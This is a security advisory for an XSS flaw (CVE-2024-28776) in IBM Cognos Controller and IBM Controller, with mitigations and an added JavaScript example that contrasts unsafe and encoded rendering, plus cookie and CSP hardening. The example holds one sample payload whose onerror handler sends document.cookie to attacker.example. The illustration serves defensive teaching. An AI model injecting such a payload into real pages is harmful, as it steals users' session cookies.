PT-2025-7406 · Ibm · Ibm Controller+1

Published 2025-02-18 · Updated 2025-02-19
CVE-2024-28776
CVSS v2.0 5.5 Medium · Vector AV:N/AC:L/Au:S/C:P/I:P/A:N
Name of the Vulnerable Software and Affected Versions IBM Cognos Controller versions 11.0.0 through 11.0.1 FP3; IBM Controller version 11.1.0
Description Cross-site scripting (XSS) in the web interface of IBM Cognos Controller 11.0.0 through 11.0.1 FP3 and IBM Controller 11.1.0. An authenticated user (the CVSS vector requires single authentication) can embed arbitrary JavaScript in the Web UI; the script executes in the browser of any user who views the affected page, altering the intended functionality of the interface and potentially disclosing credentials or session data within that user's trusted session.
Recommendations Apply the vendor fix for the affected version when it is available. Until then: for IBM Cognos Controller 11.0.0 through 11.0.1 FP3, consider disabling the web interface functionality; for IBM Controller 11.1.0, restrict access to the web interface to trusted networks and accounts, since exploitation requires an authenticated user; in either case, avoid performing sensitive operations through the web interface. Marking session cookies HttpOnly and deploying a Content-Security-Policy that forbids inline script limit what an injected script can reach, but they reduce impact only and do not remove the flaw.
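The bug class and the mitigations above, as an added example that is not code from IBM Cognos Controller, IBM Controller, or this advisory: a generic render function that interpolates a user-controlled value into web-UI markup, the same function with output encoding, a demonstration-only detector showing that the encoded output carries no executable content, and the cookie and CSP settings the recommendations refer to. The render functions, the payload and the attacker host are constructed for illustration and do not describe the vulnerable product's code.

```javascript
// Added example, not code from IBM Cognos Controller or IBM Controller.
// Shows the generic XSS pattern (untrusted input interpolated into markup)
// beside its fix, plus the settings that limit impact until a fix is applied.

// HTML-encode the five characters that change parsing context in text and
// in quoted attribute values. This is the minimal correct encoding for
// inserting untrusted data into those two positions (not into script or URL).
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern (assumed for illustration): the user-controlled value is
// concatenated into markup, so '<' and '"' in the input are parsed as HTML.
function renderUnsafe(displayName) {
  return `<span class="user">${displayName}</span>`;
}

// Hardened pattern: same template, value encoded before insertion.
function renderSafe(displayName) {
  return `<span class="user">${escapeHtml(displayName)}</span>`;
}

// Demonstration-only check: does the rendered markup contain any element
// other than the template's own <span>, an on*= event-handler attribute, or
// a javascript: URL inside a tag? Only tag bodies are inspected, so encoded
// text such as "&lt;img ... onerror=" is correctly treated as inert.
// This is an aid for the example, not a production sanitiser.
function containsActiveContent(html) {
  const tags = [...html.matchAll(/<\/?([a-zA-Z][\w-]*)[^>]*>?/g)];
  return tags.some((m) => {
    const name = m[1].toLowerCase();
    const tagBody = m[0];
    return name !== 'span' || /\son[a-z]+\s*=/i.test(tagBody) || /javascript\s*:/i.test(tagBody);
  });
}

// Constructed payload of the kind the advisory describes: an element whose
// event handler exfiltrates document.cookie from the victim's session.
const SAMPLE_PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Session-cookie attributes that limit what a successful XSS can reach:
// HttpOnly keeps the cookie out of document.cookie, Secure keeps it off
// cleartext, SameSite=Strict stops cross-site requests from carrying it.
function hardenedSessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Strict`;
}

// A Content-Security-Policy that forbids inline script and event handlers, so
// an injected onerror= or <script> does not execute in CSP-enforcing browsers.
// An application with its own inline scripts would add nonces or hashes.
function defaultCsp() {
  return "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'; frame-ancestors 'self'";
}

console.log('unsafe :', renderUnsafe(SAMPLE_PAYLOAD));
console.log('safe   :', renderSafe(SAMPLE_PAYLOAD));
console.log('active?', containsActiveContent(renderUnsafe(SAMPLE_PAYLOAD)),
            containsActiveContent(renderSafe(SAMPLE_PAYLOAD)));
console.log('Set-Cookie:', hardenedSessionCookie('SID', 'opaque session id'));
console.log('Content-Security-Policy:', defaultCsp());
```

Encoding at the point of output is the fix; the cookie attributes and CSP are the impact limiters the recommendations mention, useful while the vendor fix is pending but not a substitute for it.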

Fix

XSS


Weakness Enumeration

Related Identifiers

BDU:2025-02080
CVE-2024-28776

Affected Products

Ibm Cognos Controller
Ibm Controller